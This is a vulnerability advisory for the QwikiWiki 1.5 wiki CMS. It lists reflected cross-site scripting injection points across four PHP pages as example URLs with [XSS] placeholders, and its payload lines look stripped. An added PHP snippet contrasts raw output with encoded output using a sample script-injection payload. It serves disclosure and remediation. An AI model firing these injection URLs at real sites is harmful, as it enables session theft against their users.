QwikiWiki 1.5 <== Multiple Script Insertion Vulnerability
===================================
Information of Software:
Software: QwikiWiki 1.5
Site: http://qwikiwiki.com
Description: QwikiWiki is a very simple wiki CMS. It has many XSS vulnerabilities, and they are not difficult to exploit.
===================================
Bug:

1) index.php Multiple Script Insertion Vulnerability
QwikiWiki contains a flaw that allows a remote cross-site scripting attack. In index.php, a user can insert XSS code into the from and help parameters, used alone or combined (page=Home&from=, page=Home&help= and page=Home&from=Home&help=).
Example:
http://[target]/index.php?page=Home&from=[XSS]
http://[target]/index.php?page=Home&help=[XSS]
http://[target]/index.php?page=Home&from=Home&help=[XSS]
---------------------------------------------------
2) login.php Multiple Script Insertion Vulnerability
Example:
http://[target]/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]
---------------------------------------------------
3) pageindex.php Script Insertion Vulnerability
Example:
http://[target]/pageindex.php?nothing=nothing&help=[XSS]
---------------------------------------------------
4) recentchanges.php Script Insertion Vulnerability
Example:
http://[target]/recentchanges.php?nothing=nothing&help=[XSS]
---------------------------------------------------
You can replace the value [XSS] with:
">
">
">
and any JavaScript or HTML code.
===================================
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org
===================================
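As an added illustration (not QwikiWiki's own code), the reflection pattern behind all four findings beside an output-encoded version; the parameter name help comes from the advisory, while the surrounding input tag is assumed.

```php
<?php
// Added example, not code from QwikiWiki. Shows why a GET value echoed raw
// into an HTML attribute is exploitable with a "> prefix, and how encoding
// for the attribute context stops it. Parameter name from the advisory;
// the <input> markup around it is an assumption.

// Mimics the vulnerable pattern: the value is concatenated without encoding.
function render_help_vulnerable(string $help): string {
    return '<input type="text" name="help" value="' . $help . '">';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES also encodes
// single quotes, so the same helper stays safe inside value='...'.
function render_help_hardened(string $help): string {
    $safe = htmlspecialchars($help, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="help" value="' . $safe . '">';
}

// Constructed payload in the shape the advisory shows: close the quoted
// attribute, close the tag, then inject markup.
$payload = '"><script>alert(1)</script>';

echo render_help_vulnerable($payload), PHP_EOL;
// -> value="" followed by a live <script> element
echo render_help_hardened($payload), PHP_EOL;
// -> value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" stays inert text

// Caveat for the duplicated action=Login&action=[XSS] case: PHP keeps the
// last copy of a repeated query key, so $_GET['action'] holds the attacker
// value. Every read of a parameter must pass through the same encoding
// before it reaches the page, regardless of how many times it was sent.
```

When reviewing the real code, grep for every echo or print of a $_GET, $_POST or $_REQUEST value and confirm it is wrapped in context-appropriate encoding; the fix belongs at the output, not only in an input filter.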